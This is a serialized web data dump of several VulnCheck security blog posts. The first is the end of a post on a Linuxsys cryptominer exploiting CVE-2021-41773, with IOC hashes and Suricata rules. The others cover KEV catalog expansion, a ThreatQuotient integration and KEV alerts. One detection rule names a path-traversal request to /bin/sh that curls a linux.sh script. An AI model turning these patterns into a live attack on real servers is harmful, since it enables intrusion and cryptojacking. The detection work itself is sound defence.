variants",[22,40363,40364,40368,40372,40376,40380],{},[25,40365,40366],{},[886,40367,39804],{},[25,40369,40370],{},[886,40371,39809],{},[25,40373,40374],{},[886,40375,39814],{},[25,40377,40378],{},[886,40379,39819],{},[25,40381,40382],{},[886,40383,39824],{},[993,40385,39333],{"id":39332},[307,40387,40388,40396],{},[310,40389,40390],{},[313,40391,40392,40394],{},[316,40393,39342],{},[316,40395,39345],{},[336,40397,40398,40405,40413,40420],{},[313,40399,40400,40402],{},[341,40401,40138],{},[341,40403,40404],{},"75612233d32768186d0557dd39abbbd3284a2a29",[313,40406,40407,40410],{},[341,40408,40409],{},"config.sh",[341,40411,40412],{},"52d31b33b3dcd31bc515df70da6925deb93e2473",[313,40414,40415,40417],{},[341,40416,39645],{},[341,40418,40419],{},"7797530e1b7216fa1c7467e06008ac38e02f5a0a",[313,40421,40422,40424],{},[341,40423,39830],{},[341,40425,40426],{},"a7bbd502cc2389f4794cdc95619194c61f4e05fe",[993,40428,40430],{"id":40429},"suricata-rules","Suricata Rules",[1354,40432,40435],{"className":40433,"code":40434,"language":1359},[1357],"alert dns any any -> any 53 ( \\\n msg: \"VULNCHECK DNS Lookup for Known Malicious Linuxsys URL: repositorylinux.org\"; \\\n dns.query; content: \"repositorylinux.org\"; nocase; \\\n classtype:domain-c2; \\\n sid:12800002; rev:1;)\n\nalert http any any -> any any ( \\\n msg:\"VULNCHECK Linuxsys CVE-2021-41773 Exploit Attempt\"; \\\n flow:to_server; \\\n http.method; content:\"POST\"; \\\n http.uri.raw; content:\"\u002Fcgi-bin\u002F.%2e\u002F\"; startswith; \\\n content:\"\u002Fbin\u002Fsh\"; distance: 0; \\\n http.request_body; content:\"curl\"; \\\n content:\"\u002Flinux.sh\"; distance: 0; \\\n content:\"\u002Flinux.sh\"; distance: 0; \\\n classtype:targeted-activity; \\\n reference:cve,CVE-2021-41773; \\\n sid:12800003;)\n",[886,40436,40434],{"__ignoreMap":219},[1920,40438,202],{"id":201},[18,40440,39360,40441,1246,40448,1246,40453,1255,40458,59],{},[1131,40442,40443],{},[47,40444,40447],{"href":40445,"rel":40446},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fpapercut-rce",[51],"PaperCut Exploitation",[1131,40449,40450],{},[47,40451,36637],{"href":36635,"rel":40452},[51],[1131,40454,40455],{},[47,40456,35931],{"href":35927,"rel":40457},[51],[1131,40459,40460],{},[47,40461,22211],{"href":22207,"rel":40462},[51],[18,40464,33941,40465,33945,40468,1240,40471,982,40474,1260],{},[47,40466,1233],{"href":10806,"rel":40467},[51],[47,40469,1239],{"href":1237,"rel":40470},[51],[47,40472,1245],{"href":1243,"rel":40473},[51],[47,40475,216],{"href":1258,"rel":40476},[51],[1920,40478,2850],{"id":2849},[2901,40480,40481],{},"html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}",{"title":219,"searchDepth":220,"depth":220,"links":40483},[40484,40485,40486,40487,40488],{"id":39302,"depth":1266,"text":39303},{"id":40348,"depth":1266,"text":40349},{"id":40360,"depth":1266,"text":40361},{"id":39332,"depth":1266,"text":39333},{"id":40429,"depth":1266,"text":40430},"VulnCheck observes exploitation of CVE-2021-41773 in the wild, and attributes the attack to the Linuxsys cryptominer. The team additionally discovers that the cryptominer has been part of a long-running campaign exploiting multiple vulnerabilities with a consistent attacker methodology since at least 2021.",{"slug":40491},"linuxsys-cryptominer","\u002Fblog\u002Flinuxsys-cryptominer",{"title":36760,"description":40489},"blog\u002Flinuxsys-cryptominer",[2941,242,1281,23275,1279],"nG_whQ_FbV8B928-k9m4TMXW1falHCBMnW-E9LfZX90",{"id":40498,"title":40499,"articles":7,"authors":40500,"body":40502,"date":40685,"description":40499,"extension":234,"image":7,"link":7,"meta":40686,"navigation":237,"path":40688,"seo":40689,"series":7,"stem":40690,"subtype":7,"tags":40691,"__hash__":40692},"blog\u002Fblog\u002Fkev-expansion-2025.md","Expanding VulnCheck’s KEV: Auditing ShadowServer, New CVE Assignments, and Source Expansion",[40501],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":40503,"toc":40677},[40504,40507,40511,40514,40519,40568,40573,40577,40580,40586,40592,40598,40601,40604,40608,40614,40622,40626,40629,40635,40641,40645,40651,40660,40662,40665],[18,40505,40506],{},"In recent weeks, our KEV (Known Exploited Vulnerabilities) feed has seen a notable increase in CVEs. If you've noticed and are wondering what's driving the spike, you're not alone. The short answer: VulnCheck has been hard at work closing the gap on untracked exploitation by auditing publicly available sources and assigning CVEs where none existed. Here's a look behind the scenes at what’s been happening.",[61,40508,40510],{"id":40509},"why-the-spike-in-cves","Why the Spike in CVEs?",[18,40512,40513],{},"Two major developments contributed to the increase:",[1789,40515,40516],{},[25,40517,40518],{},"Auditing ShadowServer for Unassigned CVEs\nWe performed an extensive audit of ShadowServer's daily detection snapshots. During this process, we identified vulnerabilities with active detections but no associated CVE ID, a major blind spot for defenders relying on structured vulnerability intelligence.\nRather than let these gaps persist, we tracked down the original advisories and\u002For exploit proof-of-concepts and issued CVEs ourselves. In total, we contributed 30+ new CVEs through this audit process where exploitation evidence existed.",[18,40520,40521,40522,1246,40527,1246,40531,1246,40536,1246,40541,1246,40546,1246,40549,1246,40553,1246,40558,40563,40564,59],{},"These vulnerabilities span a range of high-risk technologies, including camera systems, network edge devices, and content management systems—frequent targets for botnets and threat actors. Notable vendors affected include ",[47,40523,40526],{"href":40524,"rel":40525},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fhikvision-ismp-rce-applyct",[51],"Hikvision",[47,40528,24304],{"href":40529,"rel":40530},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fdlink-dsl-routers-path-traversal-file-read",[51],[47,40532,40535],{"href":40533,"rel":40534},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Favtech-ipcamera-nvr-dvr-mulitple-vulns",[51],"AVTech",[47,40537,40540],{"href":40538,"rel":40539},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fdahua-smart-cloud-gateway-sql-injection",[51],"Dahua",[47,40542,40545],{"href":40543,"rel":40544},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Flinksys-routers-command-injection",[51],"Linksys",[47,40547,40548],{"href":219},"Moodle",[47,40550,24194],{"href":40551,"rel":40552},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fshenzhen-tvt-cctv-dvr-command-injection",[51],[47,40554,40557],{"href":40555,"rel":40556},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fsugarcrm-php-deserialization-rce",[51],"SugarCRM",[47,40559,40562],{"href":40560,"rel":40561},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fedimax-ew-7438rpn-command-injections",[51],"Edimax",", among others.\nMany of the issues we identified are older, unpatched flaws in widely deployed technologies, often originating from Chinese manufacturers. Details on each of these CVEs can be found in our advisory archive here: ",[47,40565,40566],{"href":40566,"rel":40567},"https:\u002F\u002Fvulncheck.com\u002Fadvisories",[51],[1789,40569,40570],{},[25,40571,40572],{},"Introduction of CrowdSec as a Source\nWe've added CrowdSec’s public exploitation evidence as a new exploitation reference source within VulnCheck KEV. We continuously seek high-signal, reliable public sources of exploitation evidence, and CrowdSec fits the bill. This resulted in the addition of 70+ vulnerabilities to VulnCheck KEV that we didn’t already have exploitation evidence for.",[61,40574,40576],{"id":40575},"expanding-the-cve-ecosystem","Expanding the CVE Ecosystem",[18,40578,40579],{},"VulnCheck’s role here isn't limited to aggregation. When we find credible exploitation without a CVE, we treat that as a security intelligence failure, and we act.\nOur Process:",[18,40581,40582,40585],{},[295,40583,40584],{},"Daily ShadowServer Snapshot Analysis","\nWe continuously ingest detection telemetry and flag items lacking CVE attribution.",[18,40587,40588,40591],{},[295,40589,40590],{},"Manual Verification","\nFor each flagged issue, we identify relevant advisories or exploits.",[18,40593,40594,40597],{},[295,40595,40596],{},"CVE Assignment","\nWhen warranted, we submit and assign a CVE through the appropriate channels. This also involves coordination with CNAs (CVE numbering authorities) with the most appropriate scope. This includes close coordination with Mitre and the new CVE research working group that was recently formed.",[18,40599,40600],{},"This proactive CVE assignment strategy isn't exclusive to ShadowServer; we're also auditing Metasploit and ExploitDB in a similar manner, so the riskiest vulnerabilities that were overlooked receive a CVE.",[18,40602,40603],{},"This highlights our commitment to the success of the CVE Program.",[61,40605,40607],{"id":40606},"meet-the-team-behind-it","Meet the Team Behind It",[18,40609,40610],{},[68,40611],{"alt":40612,"src":40613},"Wade KEVs","\u002Fblog\u002Fkev-expansion-2025\u002Fwade.png",[18,40615,40616,40617,40621],{},"This initiative was spearheaded by our vulnerability intelligence team, including recent hire ",[47,40618,40620],{"href":19765,"rel":40619},[51],"Wade Sparks III",", formerly of the CISA KEV team. Wade has been instrumental in streamlining CVE submissions and bringing field-tested experience to our approach.",[61,40623,40625],{"id":40624},"whats-next","What’s Next?",[18,40627,40628],{},"While the ShadowServer audit is nearing completion, we expect the spike in volume will taper off, our work is far from over. Next up:",[18,40630,40631,40634],{},[295,40632,40633],{},"Metasploit & ExploitDB Audits:"," Ongoing efforts to catch more untracked, higher risk vulnerabilities with readily available exploits.",[18,40636,40637,40640],{},[295,40638,40639],{},"More CVE Assignments:"," We’re committed to assigning CVE IDs to vulnerabilities that pose high risk, so they appear in scanners, dashboards, and security tools worldwide.",[61,40642,40644],{"id":40643},"follow-our-work-get-alerted","Follow Our Work & Get Alerted",[18,40646,40647,40648],{},"You can always view the latest advisories at: ",[47,40649,40566],{"href":40566,"rel":40650},[51],[18,40652,40653,40654,40659],{},"Subscribe for free to ",[47,40655,40658],{"href":40656,"rel":40657},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fvulncheck-kev-alerts",[51],"VulnCheck KEV alerts"," and get alerted via Email or Slack each time we add a new KEV.",[61,40661,202],{"id":201},[18,40663,40664],{},"VulnCheck is helping organizations not just to solve the vulnerability prioritization challenge - we’re working to help equip any product manager, security team and threat hunting team to get faster and more accurate intelligence with infinite efficiency using VulnCheck solutions.\nWe knew that defenders needed better data, faster across the board, in our industry. So that’s what we deliver to the market. We deliver key insights on vulnerability management, exploitation and major trends we can extrapolate from our dataset to continuously support practitioners.",[18,40666,40667,40668,8659,40673,40676],{},"Join the VulnCheck Community today and get access to our ",[47,40669,40672],{"href":40670,"rel":40671},"https:\u002F\u002Fvulncheck.com\u002Fnvd2",[51],"VulnCheck NVD++",[47,40674,1233],{"href":2871,"rel":40675},[51]," in 30 seconds or less.",{"title":219,"searchDepth":220,"depth":220,"links":40678},[40679,40680,40681,40682,40683,40684],{"id":40509,"depth":220,"text":40510},{"id":40575,"depth":220,"text":40576},{"id":40606,"depth":220,"text":40607},{"id":40624,"depth":220,"text":40625},{"id":40643,"depth":220,"text":40644},{"id":201,"depth":220,"text":202},"2025-07-10",{"slug":40687,"blogtitle":40499},"kev-expansion-2025","\u002Fblog\u002Fkev-expansion-2025",{"title":40499,"description":40499},"blog\u002Fkev-expansion-2025",[1280,242,1279],"HA-v5AECV-UkaFLnMRc4zfRU9t9uXqP3RmmYhM4lOlw",{"id":40694,"title":40695,"articles":40696,"authors":40697,"body":40699,"date":40887,"description":40888,"extension":234,"image":7,"link":7,"meta":40889,"navigation":237,"path":40891,"seo":40892,"series":7,"stem":40893,"subtype":7,"tags":40894,"__hash__":40895},"blog\u002Fblog\u002Fvulncheck-threatquotient-partnership.md","VulnCheck Integrates with ThreatQuotient: Operationalize Exploit Intelligence in the ThreatQ Platform and is Now Generally Available on the ThreatQ Marketplace",[],[40698],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":40700,"toc":40879},[40701,40708,40714,40717,40725,40731,40737,40740,40748,40751,40754,40757,40763,40766,40812,40815,40821,40824,40850,40856,40859,40865,40872],[18,40702,40703],{},[68,40704],{"alt":40705,"src":40706,"style":40707},"VulnCheck & ThreatQuotient Partnership","\u002Fblog\u002Fvuln-check-and-threat-quotient-partnership-email-banner.png","width:100%;",[61,40709,40711],{"id":40710},"strategic-partnership-announcement",[295,40712,40713],{},"Strategic Partnership Announcement",[18,40715,40716],{},"VulnCheck is excited to announce its integration with ThreatQuotient’s ThreatQ Platform — now generally available in the ThreatQ Marketplace. This integration brings VulnCheck’s exploit-centric vulnerability intelligence directly into ThreatQ, enabling joint customers to supercharge threat operations, vulnerability prioritization, and incident response with real-world exploit data.",[18,40718,2245,40719,40724],{},[47,40720,40723],{"href":40721,"rel":40722},"https:\u002F\u002Fhubs.la\u002FQ03vyBSv0",[51],"VulnCheck app is available here"," in the ThreatQ Marketplace.",[61,40726,40728],{"id":40727},"the-problem-were-solving-together",[295,40729,40730],{},"The Problem We're Solving Together:",[18,40732,40733,40734],{},"Security teams are constantly forced to triage long lists of vulnerabilities with limited context. CVSS scores and basic enrichment often miss the most critical piece: ",[295,40735,40736],{},"Is this vulnerability actively being exploited — and how?",[18,40738,40739],{},"Combined with the lack of true automation in the market to power timely threat response when new exploited vulnerabilities are validated and confirmed, teams also have to rely on slow and manual processes to triage what they hope are the prioritized vulnerabilities.",[18,40741,40742,40743,59],{},"ThreatQuotient customers can now integrate and rely on VulnCheck’s Community intelligence feeds to support their response workflows. VulnCheck KEV, ",[47,40744,40747],{"href":40745,"rel":40746},"https:\u002F\u002Fvulncheck.com\u002Fcommunity",[51],"freely available on VulnCheck’s Community tier",[18,40749,40750],{},"By combining VulnCheck’s deep visibility into exploitation with ThreatQuotient’s powerful threat operations platform, organizations can focus efforts on vulnerabilities that matter most.",[18,40752,40753],{},"What’s cool about this partnership is that ThreatQuotient customers can leverage VulnCheck data easily by simply downloading the app in the Marketplace, and apply it to automated response playbooks.",[18,40755,40756],{},"ThreatQuotient is a leader in the Threat Intelligence Platform (TIP) market, and under Securonix now, we look forward to exposing VulnCheck intelligence a global installed based that carries a significant footprint in the enterprise.",[61,40758,40760],{"id":40759},"what-vulncheck-brings-to-threatq",[295,40761,40762],{},"What VulnCheck Brings to ThreatQ",[18,40764,40765],{},"The VulnCheck integration provides automated ingestion of machine-readable, exploit-enriched vulnerability intelligence directly into the ThreatQ Platform, including:",[22,40767,40768,40793],{},[25,40769,40770,40773],{},[295,40771,40772],{},"Exploit Intelligence:",[22,40774,40775,40778,40781,40784,40787,40790],{},[25,40776,40777],{},"Evidence-based exploitation in-the-wild intelligence",[25,40779,40780],{},"GitHub-hosted PoCs, exploit toolkits, and malware references",[25,40782,40783],{},"Exploit maturity (PoC-only vs. weaponized vs. widely exploited)",[25,40785,40786],{},"Exploit type classification (e.g., RCE, privilege escalation)",[25,40788,40789],{},"Indicators tied to known exploitation associated with attacker activity and ransomware families",[25,40791,40792],{},"Campaign tracking for initial access brokers and opportunistic threat actors",[25,40794,40795,40798],{},[295,40796,40797],{},"Vulnerability Intelligence:",[22,40799,40800,40803,40806,40809],{},[25,40801,40802],{},"Enriched CVE metadata beyond NVD and CISA KEV",[25,40804,40805],{},"Real-time timelines of exploit activity and vulnerability lifecycle",[25,40807,40808],{},"Risk context mapped to real-world threat behavior",[25,40810,40811],{},"Added CPE intelligence that is not available on NIST NVD",[18,40813,40814],{},"This integration allows ThreatQ users to automatically normalize and correlate VulnCheck data with their broader threat intel ecosystem, including malware families, adversary TTPs, intrusion sets, and vulnerability disclosures.",[61,40816,40818],{"id":40817},"key-use-cases-for-joint-customers",[295,40819,40820],{},"Key Use Cases for Joint Customers",[18,40822,40823],{},"There are key use cases this integration delivers to enterprise and Federal customers to improve response time, validate known exploited vulnerabilities, investigate vulnerabilities with added context and CPE intelligence and automate rapid responses for the most highly-prioritized vulnerabilities.",[1789,40825,40826,40832,40838,40844],{},[25,40827,40828,40831],{},[295,40829,40830],{},"Vulnerability Prioritization Based on Exploitation, Not Just Scores"," Move beyond CVSS-based triage by identifying the subset of vulnerabilities that are currently being exploited or are highly exploitable.",[25,40833,40834,40837],{},[295,40835,40836],{},"Enrichment of Threat Objects and Events"," Enrich CVEs, observables, and adversary profiles in ThreatQ with VulnCheck’s data — including exploit PoCs, C2 infrastructure, and in-the-wild sightings.",[25,40839,40840,40843],{},[295,40841,40842],{},"Automated Detection Engineering & Response"," Use VulnCheck indicators and IP telemetry to proactively hunt for signs of exploitation and harden defenses against active threats.",[25,40845,40846,40849],{},[295,40847,40848],{},"Threat Intelligence Fusion and Campaign Tracking"," Link known exploits and vulnerable assets to malware toolchains, initial access campaigns, and adversary tradecraft.",[61,40851,40853],{"id":40852},"why-it-matters",[295,40854,40855],{},"Why It Matters:",[18,40857,40858],{},"VulnCheck doesn’t just tell you what could go wrong — it shows you what is going wrong, right now. Combined with ThreatQ, this gives SOC, CTI, vulnerability management, pentesting \u002F red-teaming and AppSec teams a force multiplier for operationalizing exploit intelligence across detection, response, and remediation.",[61,40860,40862],{"id":40861},"get-started-today",[295,40863,40864],{},"Get Started Today:",[18,40866,40867,40871],{},[47,40868,40870],{"href":40721,"rel":40869},[51],"VulnCheck is available today in the ThreatQ Marketplace",". Integration takes just minutes — connect your VulnCheck API credentials and start ingesting high-value exploit intelligence directly into your ThreatQ instance.",[18,40873,40874,40875,59],{},"For setup instructions, visit: ",[47,40876,40877],{"href":40877,"rel":40878},"https:\u002F\u002Fdocs.vulncheck.com",[51],{"title":219,"searchDepth":220,"depth":220,"links":40880},[40881,40882,40883,40884,40885,40886],{"id":40710,"depth":220,"text":40713},{"id":40727,"depth":220,"text":40730},{"id":40759,"depth":220,"text":40762},{"id":40817,"depth":220,"text":40820},{"id":40852,"depth":220,"text":40855},{"id":40861,"depth":220,"text":40864},"2025-07-02","This integration brings VulnCheck’s exploit-centric vulnerability intelligence directly into ThreatQ, enabling joint customers to supercharge threat operations, vulnerability prioritization, and incident response with real-world exploit data.",{"slug":40890},"vulncheck-threatquotient-partnership","\u002Fblog\u002Fvulncheck-threatquotient-partnership",{"description":40888,"title":40695},"blog\u002Fvulncheck-threatquotient-partnership",[],"mbGfTxrO-FP7X8uEL0gRwYs20z5ogM2EhHavM8sHxx4",{"id":40897,"title":40898,"articles":40899,"authors":40908,"body":40910,"date":40903,"description":41052,"extension":234,"image":7,"link":7,"meta":41053,"navigation":237,"path":41054,"seo":41055,"series":7,"stem":41056,"subtype":7,"tags":41057,"__hash__":41058},"blog\u002Fblog\u002Fvulncheck-kev-alerts.md","Timely Threat Intelligence for Defenders with VulnCheck KEV Alerts",[40900,40904],{"title":40901,"source":251,"link":40902,"date":40903},"VulnCheck Expands Real-Time KEV Alerts with Broader Integrations, Faster Intelligence, and Scalable API Access","https:\u002F\u002Fwww.msspalert.com\u002Fnews\u002Fvulncheck-expands-real-time-kev-alerts-with-broader-integrations-faster-intelligence-and-scalable-api-access","2025-06-25",{"title":40905,"source":40906,"link":40907,"date":40903},"VulnCheck KEV Alerts Deliver Instant Warnings on Actively Exploited Vulnerabilities with Real-Time Slack and Email Notifications","VMBlog","https:\u002F\u002Fvmblog.com\u002Farchive\u002F2025\u002F06\u002F25\u002Fvulncheck-kev-alerts-deliver-instant-warnings-on-actively-exploited-vulnerabilities-with-real-time-slack-and-email-notifications.aspx",[40909],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":40911,"toc":41039},[40912,40918,40920,40931,40935,40938,40941,40947,40951,40954,40959,40963,40966,40971,40975,40978,40982,40985,40988,40992,40998,41001,41005,41011,41014,41018,41024,41027,41029,41031],[18,40913,40914],{},[68,40915],{"alt":40916,"src":40917},"VulnCheck KEV Alerts","\u002Fblog\u002Fvulncheck-kev-alerts\u002Fvulncheck-kev-alerts.png",[61,40919,20],{"id":3520},[22,40921,40922,40925,40928],{},[25,40923,40924],{},"VulnCheck KEV has expanded to provide Email and Slack alerting.",[25,40926,40927],{},"In 2025, VulnCheck KEV has 142% more KEVs than CISA.",[25,40929,40930],{},"Based on VulnCheck intelligence, 70.3% of CISA KEVs have publicly available exploitation evidence days, months or years before being added to the CISA KEV catalog.",[61,40932,40934],{"id":40933},"email-slack-alerting-now-available-for-vulncheck-kev","Email \u002F Slack Alerting Now Available for VulnCheck KEV",[18,40936,40937],{},"We’re excited to announce the expansion of VulnCheck Community to include VulnCheck KEV Alerts: you can now receive alerts via Email and Slack. This further enhances the accessibility of VulnCheck KEV, which is now available through the VulnCheck API, Go SDK, Python SDK, CLI, web interface, and, most recently, via email and Slack.",[18,40939,40940],{},"This new capability enables defenders to receive real-time notifications whenever a new vulnerability is added to VulnCheck KEV, helping you stay ahead of exploitation activity and respond more quickly to emerging threats.",[18,40942,40943,40944],{},"VulnCheck Alerts Configuration Documentation: ",[47,40945,19592],{"href":19592,"rel":40946},[51],[993,40948,40950],{"id":40949},"email-alerts","Email Alerts",[18,40952,40953],{},"Subscribe to receive an email notification every time VulnCheck adds a new Known Exploited Vulnerability. Get exploitation intelligence delivered straight to your inbox.",[18,40955,40956],{},[68,40957],{"alt":40950,"src":40958},"\u002Fblog\u002Fvulncheck-kev-alerts\u002Femail-alerts.png",[993,40960,40962],{"id":40961},"slack-alerts","Slack Alerts",[18,40964,40965],{},"Configure Slack integration to receive real-time alerts in the channel of your choice whenever a new KEV is published. Keep your team in the loop and act fast without leaving your workspace.",[18,40967,40968],{},[68,40969],{"alt":40962,"src":40970,"width":28205},"\u002Fblog\u002Fvulncheck-kev-alerts\u002Fslack-alerts.png",[61,40972,40974],{"id":40973},"a-year-of-growth-and-impact-with-vulncheck-kev","A Year of Growth and Impact with VulnCheck KEV",[18,40976,40977],{},"Today, VulnCheck KEV includes over 3,700 known exploited vulnerabilities. It’s trusted by thousands of defenders worldwide and integrated into a growing number of security products. This milestone reflects our commitment to arming the security community with the data necessary to act quickly and effectively against the most significant threats.",[61,40979,40981],{"id":40980},"what-makes-vulncheck-kev-unique","What Makes VulnCheck KEV Unique",[18,40983,40984],{},"VulnCheck provides timely, high-quality intelligence on exploited vulnerabilities, including:\nPublicly referenceable exploitation evidence\nRansomware attribution Exploits from VulnCheck XDB (eXploit DataBase) - so defenders know what\u002Fhow to block an attack.",[18,40986,40987],{},"We continue to support and complement CISA’s efforts. Still, our focus remains on delivering broader, faster, and more actionable exploitation intelligence to all defenders, without restrictions, while extending alerting and tooling that provides easy access to both VulnCheck community and commercial offerings..",[61,40989,40991],{"id":40990},"known-exploited-vulnerabilities-added-to-vulncheck-kev-vs-cisa-kev-jan-24-2025-to-jun-20-2025","Known Exploited Vulnerabilities Added to VulnCheck KEV vs. CISA KEV (Jan. 24, 2025 to Jun. 20, 2025)",[18,40993,40994],{},[68,40995],{"alt":40996,"src":40997},"Comparison","\u002Fblog\u002Fvulncheck-kev-alerts\u002Fvulncheck-cisa-comparison-2025.png",[18,40999,41000],{},"VulnCheck fully incorporates the CISA Known Exploited Vulnerabilities (KEV) catalog, but our intelligence goes further; we continuously aggregate exploitation evidence from hundreds of independent sources every day. For defenders, understanding the volume of new KEVs each month is crucial for capacity planning, prioritization and timely mitigation.\nOn average, security teams can expect VulnCheck KEV to identify between 40 and 100 CVEs per month that have confirmed evidence of exploitation. While most months fall within this range, there are occasional outliers.",[61,41002,41004],{"id":41003},"_2025-timeline-comparison-of-vulncheck-kev-vs-cisa-kev-jan-24-2025-to-jun-20-2025","2025 Timeline Comparison of VulnCheck KEV vs. CISA KEV (Jan. 24, 2025 to Jun. 20, 2025)",[18,41006,41007],{},[68,41008],{"alt":41009,"src":41010},"Daily Kev Comparison","\u002Fblog\u002Fvulncheck-kev-alerts\u002Fdaily-kev-comparison.png",[18,41012,41013],{},"We have prioritized the automation of trusted sources such as CISA KEV, Shadow Server, and Microsoft MSRC, while our analyst team actively triages and validates exploitation evidence from additional channels. From January 24 through June 20 of this year, VulnCheck identified 311 CVEs with evidence of exploitation, resulting in 142% more KEVs than CISA in 2025.",[61,41015,41017],{"id":41016},"_2025-speed-comparison-of-vulncheck-kev-vs-cisa-kev","2025 Speed Comparison of VulnCheck KEV vs. CISA KEV",[18,41019,41020],{},[68,41021],{"alt":41022,"src":41023},"VulnCheck KEV Timeline","\u002Fblog\u002Fvulncheck-kev-alerts\u002Fvulncheck-kev-timeline.png",[18,41025,41026],{},"A key focus of VulnCheck KEV is speed, ensuring defenders receive early visibility when a vulnerability is being actively exploited in the wild. In 2025, VulnCheck added 311 exploited vulnerabilities to its KEV. Of those, only 128 have also been included in the CISA KEV so far. For 90 of the 128 vulnerabilities, representing 70.3%, evidence of exploitation existed days, months, or even years before their inclusion in the CISA KEV.",[61,41028,202],{"id":201},[18,41030,40664],{},[18,41032,40667,41033,8659,41036,40676],{},[47,41034,40672],{"href":40670,"rel":41035},[51],[47,41037,1233],{"href":2871,"rel":41038},[51],{"title":219,"searchDepth":220,"depth":220,"links":41040},[41041,41042,41046,41047,41048,41049,41050,41051],{"id":3520,"depth":220,"text":20},{"id":40933,"depth":220,"text":40934,"children":41043},[41044,41045],{"id":40949,"depth":1266,"text":40950},{"id":40961,"depth":1266,"text":40962},{"id":40973,"depth":220,"text":40974},{"id":40980,"depth":220,"text":40981},{"id":40990,"depth":220,"text":40991},{"id":41003,"depth":220,"text":41004},{"id":41016,"depth":220,"text":41017},{"id":201,"depth":220,"text":202},"We're excited to announce the expansion of VulnCheck Community to include VulnCheck KEV Alerts via Email and Slack",{},"\u002Fblog\u002Fvulncheck-kev-alerts",{"title":40898,"description":41052},"blog\u002Fvulncheck-kev-alerts",[1280,242,1279],"NhpPx_oUi8to9AiRcLqDZ_hPTHDzL4sWd2aXzhmlfjY",{"id":41060,"title":41061,"articles":7,"authors":41062,"body":41064,"date":41210,"description":41211,"extension":234,"image":7,"link":7,"meta":41212,"navigation":237,"path":41214,"seo":41215,"series":7,"stem":41216,"subtype":7,"tags":7,"__hash__":41217},"blog\u002Fblog\u002Fcve-fragility.md","CVE Fragility Is Real, But Totally 